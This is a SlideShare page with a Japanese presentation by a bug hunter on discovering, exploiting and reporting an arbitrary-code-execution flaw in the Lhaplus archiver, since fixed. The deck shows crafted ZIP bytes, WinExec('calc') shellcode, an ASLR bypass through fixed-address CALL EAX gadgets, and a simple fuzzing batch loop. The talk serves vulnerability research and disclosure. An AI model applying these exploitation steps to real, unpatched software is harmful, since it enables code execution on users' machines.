Home
Explore
Submit Search
Upload
Login
Signup
Advertisement
Check these out next
Good Stuff Happens in 1:1 Meetings: Why you need them and how to do them well
Saba Software
Introduction to C Programming Language
Simplilearn
The Pixar Way: 37 Quotes on Developing and Maintaining a Creative Company (fr...
Palo Alto Software
9 Tips for a Work-free Vacation
Weekdone.com
I Rock Therefore I Am. 20 Legendary Quotes from Prince
Empowered Presentations
How to Map Your Future
SlideShop.com
Read with Pride | LGBTQ+ Reads
Kayla Martin-Gant
Exploring ChatGPT for Effective Teaching and Learning.pptx
Stan Skrabut, Ed.D.
1
of
75
Top clipped slide
いでよ、電卓!
Mar. 27, 2015
•
0 likes
17 likes
×
Be the first to like this
Show More
•
16,160 views
views
×
Total views
0
On Slideshare
0
From embeds
0
Number of embeds
0
Download Now
Download to read offline
Report
Technology
第4期サイボウズラボユース成果報告会の発表資料
Masato Kinugawa
Follow
Advertisement
Advertisement
Advertisement
Recommended
Misosou=Justice of Punctual+mazekoze+umatobi
ume doblock
346 views
•
44 slides
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
38.7K views
•
141 slides
X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~
Masato Kinugawa
21K views
•
141 slides
Bug-hunter's Sorrow
Masato Kinugawa
8.6K views
•
59 slides
バグハンターの哀しみ
Masato Kinugawa
47.8K views
•
59 slides
SecurityCamp2015「バグハンティング入門」
Masato Kinugawa
31.6K views
•
94 slides
More Related Content
Recently uploaded
(20)
TestSIP (1).pdf
DeependraSingh712859
•
2 views
Kubernetes超入門
Takashi Suzuki
•
5 views
20230601_Visual_IoTLT_vol14_kitazaki_v1.pdf
Ayachika Kitazaki
•
72 views
【DL輪読会】DINOv2: Learning Robust Visual Features without Supervision
Deep Learning JP
•
74 views
開発環境向けEKSのコスト最適
ducphan87
•
0 views
【DL輪読会】大量API・ツールの扱いに特化したLLM
Deep Learning JP
•
126 views
Wandb LLM Webinar May 30 2023 (配布用).pdf
Yuya Yamamoto
•
65 views
OIDC(OpenID Connect)について解説③
iPride Co., Ltd.
•
25 views
20230602_enebular_meetup_kitazaki_v1.pdf
Ayachika Kitazaki
•
39 views
HTTPの仕組みについて
iPride Co., Ltd.
•
11 views
ChatGPT触ってみた
infinite_loop
•
62 views
統計学の攻略_推測統計学の考え方.pdf
akipii Oga
•
264 views
SoftwareControl.pdf
ssusercd9928
•
7 views
Transformerについて解説!!
Yosuke Horio
•
0 views
GraalVMでのFlight Recorderを使ったパフォーマンス解析(JJUG CCC 2023 Spring)
NTT DATA Technology & Innovation
•
0 views
Voyager: An Open-Ended Embodied Agent with Large Language Models
harmonylab
•
16 views
統計学の攻略_統計的仮説検定の9パターン.pdf
akipii Oga
•
254 views
PCベース制御による集中制御.pdf
ssusercd9928
•
19 views
触感に関わる共感覚的表現と基本6感情の対応関係の検証
Matsushita Laboratory
•
22 views
《杨百翰大学毕业证|学位证书校内仿真版本》
d520dasw12
•
2 views
Featured
(20)
Good Stuff Happens in 1:1 Meetings: Why you need them and how to do them well
Saba Software
•
1.6K views
Introduction to C Programming Language
Simplilearn
•
333 views
The Pixar Way: 37 Quotes on Developing and Maintaining a Creative Company (fr...
Palo Alto Software
•
83.4K views
9 Tips for a Work-free Vacation
Weekdone.com
•
2.3K views
I Rock Therefore I Am. 20 Legendary Quotes from Prince
Empowered Presentations
•
137.7K views
How to Map Your Future
SlideShop.com
•
265.2K views
Read with Pride | LGBTQ+ Reads
Kayla Martin-Gant
•
175 views
Exploring ChatGPT for Effective Teaching and Learning.pptx
Stan Skrabut, Ed.D.
•
52K views
How to train your robot (with Deep Reinforcement Learning)
Lucas García, PhD
•
40.1K views
4 Strategies to Renew Your Career Passion
Daniel Goleman
•
119.9K views
The Student's Guide to LinkedIn
LinkedIn
•
82.5K views
Different Roles in Machine Learning Career
Intellipaat
•
11.2K views
Defining a Tech Project Vision in Eight Quick Steps pdf
TechSoup
•
8.6K views
The Hero's Journey (For movie fans, Lego fans, and presenters!)
Dan Roam
•
28K views
10 Inspirational Quotes for Graduation
Guy Kawasaki
•
301.4K views
The Health Benefits of Dogs
The Presentation Designer
•
34.2K views
The Benefits of Doing Nothing
INSEAD
•
51.3K views
A non-technical introduction to ChatGPT - SEDA.pptx
Sue Beckingham
•
17.9K views
The Dungeons & Dragons Guide to Marketing
Ian Lurie
•
15.9K views
How You Can Change the World
24Slides
•
57.9K views
Advertisement
いでよ、電卓!
いでよ、電卓! ZIP 👆 Click Click IDEYO_CALC.zip Masato Kinugawa
自己紹介(1) • Masato Kinugawa •
脆弱性を発見することが好き • 学生ではない http://labs.cybozu.co.jp/recruit/youth.html
自己紹介(2) • 普段は家で脆弱性を探してお金を稼ぐ人 • サイボウズにもいつもお世話になっております
サイボウズ・ラボユースとは サイボウズ・ラボユースは、世界に通用する日 本の若手エンジニアの発掘と育成を目指すこと を目的とし、学生の若手クリエイターに研究開 発の機会を提供する場として、2011年3月31日 に設立されました。 2011年度、2012年度、2013年度、2014年 度では、日本全国より応募のあった中から高校 生1名、工業高校生1名、大学生7名、大学院生4 名、バグハンター1名、合計14名を選抜し、サ イボウズ・ラボの社員が直々に開発を指導し、 それぞれの研究テーマに取り組んでいただきま した。 https://atnd.org/events/64358
これまでやってきたこと 脆弱なサイト alert()の実行!
これからやりたいこと 脆弱なEXE 電卓の実行!
当初のテーマ 「Webアプリケーションの脆弱性発見」 そのきっかけとは ➡ 東京体験・出社体験しながら、 ガツガツWebの脆弱性を 発見するぞ~ ところがなぜかアセンブリ言語を学ぶことに… 僕
最初の数日 • ちょうどAdobe Flashの脆弱性をみていたのでその 続きを追うことにした (このバグは後日CVE-2014-0548として修正) •
メモリ関連のバグを追っていた訳ではなかったが検 証中に… _人人人人人人人_ > 突然のクラッシュ <  ̄Y^Y^Y^Y^Y^Y^Y^Y ̄
竹迫さん このとき バイナリ関連の脆弱性も発見できるように なりたいんですよねー ここで勉強すればいいじゃないですか 僕
竹迫さん このとき バイナリ関連の脆弱性も発見できるように なりたいんですよねー ここで勉強すればいいじゃないですか 僕
それからのラボユース • ずっとアセンブリ言語読んでた • 教科書「リバースエンジニアリングバイブル」
ラボユース終了 月日は流れ 2014年11月 某Androidアプリ(.apk)の中をみようと 拡張子を.zipに変更し 普段使うアーカイバで解凍中に… _人人人人人人人_ > 突然のクラッシュ
<  ̄Y^Y^Y^Y^Y^Y^Y^Y ̄
注意 これ以降、現在報告中の現時点で修正され ていない問題を解説します。具体的な問題 箇所はわからないように配慮しています。 http://jvn.jp/jp/JVN12329472/index.html 修正されました! JVN#12329472: Lhaplus において任意のコードを実行される脆弱性
おや、クラッシュのようすが… ZIPのバイナリ 50 4B 03
04 ... 41 41 41 41 CC 4A 1F 0B ... EAX = 41414141 ;ここで 41414141+C のアドレスをReadしてクラッシュ MOV EAX,DWORD PTR DS:[EAX+C]
悪用できそ うな空気 おや、クラッシュのようすが… ;ここで 41414141+C のアドレスをReadしてクラッシュ MOV
EAX,DWORD PTR DS:[EAX+C] 50 4B 03 04 ... 41 41 41 41 CC 4A 1F 0B ... EAX = 41414141 ZIPのバイナリ
友人バグハンターに相談 悪用できそ うな空気 悪用できそ うな空気 悪用できそ うな空気 悪用できそ うな空気 これ、CALLの部分でおちてない? どうもデバッガでアタッチしない状態で 解凍をはじめるとおちる位置が変わる 友 MOV EBP,DWORD PTR
DS:[EAX] CALL DWORD PTR SS:[EBP+10] ;crash!
そして... • 友人がXP上で電卓起動に成功! • でもXPは既にMicrosoftがサポートを終了している •
悪用可能なことの証明とはいいがたい 自力で新しいWindowsでも実行できるよう頑張る! 🔥よみがえるバイナリ熱
最近のWindowsにあるASLR • 配置されるメモリ位置をランダムにする機能 • これにより狙ったメモリを実行することが困難に •
今回のアプリは開発者が明示的にASLRを指定して いなかったので、一部はランダムでない ワンチャン有る?!
XPで起きたこと振り返り
XPで起きたこと メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18
| XXXXXX1C | XXXXXX20 | XXXXXX24 | ZIPのバイナリ ... 37 C6 E0 2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … いつも同じアドレスに ZIPファイルのバイナリ が配置される
XPで起きたこと メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18
| XXXXXX1C | XXXXXX20 | XXXXXX24 | ZIPのバイナリ ... 37 C6 E0 2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … いつも同じアドレスに ZIPファイルのバイナリ が配置される
XPで起きたこと 37 C6 E0
2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | ZIPのバイナリ ... 37 C6 E0 2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … いつも同じアドレスに ZIPファイルのバイナリ が配置される
XPで起きたこと 37 C6 E0
2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 紆余曲折を経て クラッシュした 命令へ
XPで起きたこと 37 C6 E0
2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 紆余曲折を経て クラッシュした 命令へ このときのCALL先を 決めているEAXはいつも ここを指す
XPで起きたこと 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | ZIPのバイナリ ... 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … CALL先をうまく変え 好きな命令を実行するよう ZIPのバイナリを編集してみる MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10]
XPで起きたこと 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] EBPへコピーされる値 逆さにして EBP = XX XX XX 04
XPで起きたこと 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] EBP+10はここで
XPで起きたこと 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] EBP+10はここで その中身はこれ XX XX XX 18 (= 次実行するアドレス)
XPで起きたこと 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] CALLでとぶ アドレスは ここなので
XPで起きたこと 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] CALLでとぶ アドレスは ここなので 次実行されるのはここから (自分が指定した命令!)
XPで起きたこと XXXXXX18 |6A 00
PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ 命令に直すと
スタック XPで起きたこと XXXXXX18 |6A 00
PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 PUSH 0 (文字列の終端)
スタック XPで起きたこと XXXXXX18 |6A 00
PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 PUSH 636C6163 (calc という文字列)
スタック XPで起きたこと XXXXXX18 |6A 00
PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 MOV EBX,ESP EBX
スタック XPで起きたこと XXXXXX18 |6A 00
PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 1 PUSH 1 EBX
スタック XPで起きたこと XXXXXX18 |6A 00
PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 1 Pointer PUSH EBX EBX
スタック XPで起きたこと XXXXXX18 |6A 00
PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 1 Pointer WinExec関数は 引数1 コマンド文字列へのポインタ 引数2 表示状態 とするとコマンドが実行できる
スタック XPで起きたこと XXXXXX18 |6A 00
PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 1 Pointer
ASLRがあると XXXXXX18 |6A 00
PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ ➊このアドレス が毎回変わる ❷WinExecの 位置が変わる
➊への対処 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] アドレスは変わるが EAXは必ずここ
➊への対処 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] アドレスは変わるが EAXは必ずここ それなら JMP EAX/CALL EAX みたいな部分にこの CALLでとべば...
➊への対処 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] それなら JMP EAX/CALL EAX みたいな部分にこの CALLでとべば... ここから実行するから なんだかできそう!
➊への対処 04 XX XX
XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ JMP EAX = FF E0 CALL EAX = FF D0 になるので このバイト値を検索
00666666 | FF
D0 … | ASLRなしのどこか CALL EAXが あった! ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ JMP EAX = FF E0 CALL EAX = FF D0 になるので このバイト値を検索
00666666 | FF
D0 … | ASLRなしのどこか ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] こうとびたい CALL EAX
00666666 | FF
D0 … | ASLRなしのどこか ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] こうとびたい 00666666が 入ってる場所が あればいけそう CALL EAX
00666666 | FF
D0 … | ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか あった! CALL EAX
00666666 | FF
D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか 数をあわせる CALL EAX
00666666 | FF
D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX
00666666 | FF
D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45
00666666 | FF
D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45 EBP+10 = 00 55 55 55
00666666 | FF
D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45 EBP+10 = 00 55 55 55 CALL先 = 00 66 66 66
00666666 | FF
D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45 EBP+10 = 00 55 55 55 CALL先 = 00 66 66 66
00666666 | FF
D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45 EBP+10 = 00 55 55 55 CALL先 = 00 66 66 66
➊への対処 ???????? |45 INC
EBP ???????? |55 PUSH EBP ???????? |55 PUSH EBP ???????? |00 ???????? |6A 00 PUSH 0 ???????? |68 63616C63 PUSH 636C6163 ???????? |8BDC MOV EBX,ESP ... 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ アドレスに 使ったところが 命令になる 命令に直すと↓
➊への対処 ???????? |45 INC
EBP ???????? |55 PUSH EBP ???????? |55 PUSH EBP ???????? |00 ???????? |6A 00 PUSH 0 ???????? |68 63616C63 PUSH 636C6163 ???????? |8BDC MOV EBX,ESP ... 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ ここは 命令として おかしい
➊への対処 ???????? |45 INC
EBP ???????? |55 PUSH EBP ???????? |55 PUSH EBP ???????? |00FF ADD BH,BH ???????? |6A 00 PUSH 0 ???????? |68 63616C63 PUSH 636C6163 ???????? |8BDC MOV EBX,ESP ... 45 55 55 00 FF 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ これで有効な 命令に! 適当に たした
❷への対処(WinExecが不明) ASLRがきいていない部分にWinExecを呼び出し ている箇所があった!そこへとべば解決! 00444444| CALL <JMP.&kernel32.WinExec> ????????
|6A 00 PUSH 0 ???????? |68 63616C63 PUSH 636C6163 ???????? |8BDC MOV EBX,ESP ???????? |6A 01 PUSH 1 ???????? |53 PUSH EBX ???????? |E8 YYYYYYYY CALL kernel32.WinExec ???????? |68 00444444 PUSH 44444400 ???????? |C3 RETN
証明はできた! IPAを通して報告! 後日 ファイルがでかすぎて開発者が問題箇所を 特定できないと思います… IPA 実証コードは 15MB以上... (元ファイルを攻撃可能なように改変しただけ) できれば小さくしたかったが...
もう一度頑張る • ひたすら動的解析 • アセンブリだけみててもキツイのでZIPの構造 を調べる
その結果 • ある領域が特定のバイト値になっていると脆弱 なルーチンに到達することを発見 • これが鍵になり
15MB → 12KBの減量に成功!
もっと頑張る • 同アーカイバは多数の圧縮フォーマットをサ ポート • こんなにあればどれかには穴があるのでは? rar cab arj lzh zoo ZIP
Fuzzingすることに • Fuzzingは脆弱性発見手法の1つ • 非常に参考になる本:
簡単にFuzzingする 1 対応フォーマットの小さなファイルを用意
簡単にFuzzingする 2 ファイルの先頭から順番にわずかにファイル の中身を変えたものを作る FF 4B
03 04 0A … 50 4B 03 04 0A …base.zip test0.zip
簡単にFuzzingする 2 ファイルの先頭から順番にわずかにファイル の中身を変えたものを作る 50 FF
03 04 0A … FF 4B 03 04 0A … 50 4B 03 04 0A …base.zip test0.zip test1.zip
簡単にFuzzingする 2 ファイルの先頭から順番にわずかにファイル の中身を変えたものを作る 50 FF
03 04 0A … 50 4B FF 04 0A … FF 4B 03 04 0A … 50 4B 03 04 0A …base.zip test0.zip test1.zip test2.zip
簡単にFuzzingする 2 ファイルの先頭から順番にわずかにファイル の中身を変えたものを作る 50 FF
03 04 0A … 50 4B FF 04 0A … 50 4B 03 FF 0A … FF 4B 03 04 0A … 50 4B 03 04 0A … … base.zip test0.zip test1.zip test2.zip test3.zip
簡単にFuzzingする 3 アーカイバにくわせクラッシュしないか見る 50 FF
03 04 0A … 50 4B FF 04 0A … 50 4B 03 FF 0A … FF 4B 03 04 0A … 50 4B 03 04 0A … … base.zip test0.zip test1.zip test2.zip test3.zip 👀
簡単にFuzzingする [作成] Python(ただバイトを変えるだけ) [起動] バッチファイル(起動/終了を繰り返すだけ) 超単純だが
(悪用可能かどうかは別として) 様々なソフトで試すと結構クラッシュにぶつかる for %%d in (*.zip) do start "" target.exe "%%d"&timeout 5&taskkill /IM target.exe 同アーカイバで悪用可能なクラッシュも検出! その圧縮フォーマットとは... ➡
ZOO 一番ヒントになったzoo展開のソース http://archives.math.utk.edu/software/mul ti-platform/gap/util/unzoo.c 情報が少なくて厳しい なんとかある領域が 原因であることを特定
今後の展望 【目標】年内にメモリ関連のバグで報奨金を得る そのために: • C/C++プログラミングの理解(ソースコードを 想像できないと輪郭が掴み辛い) • アセンブリ言語を読む、読む、読む •
もう少し賢いファジングをしたい • 実行した経路(コード網羅率)を記録し、観察すると いいそうなので注目中
ラボユース ~ 現在 バイナリも少しできる(?)人 Webしかできない人
電卓起動 しまくるぞっ!
@kinugawamasato ✉ masatokinugawa [at]
gmail.com Thanks!
Advertisement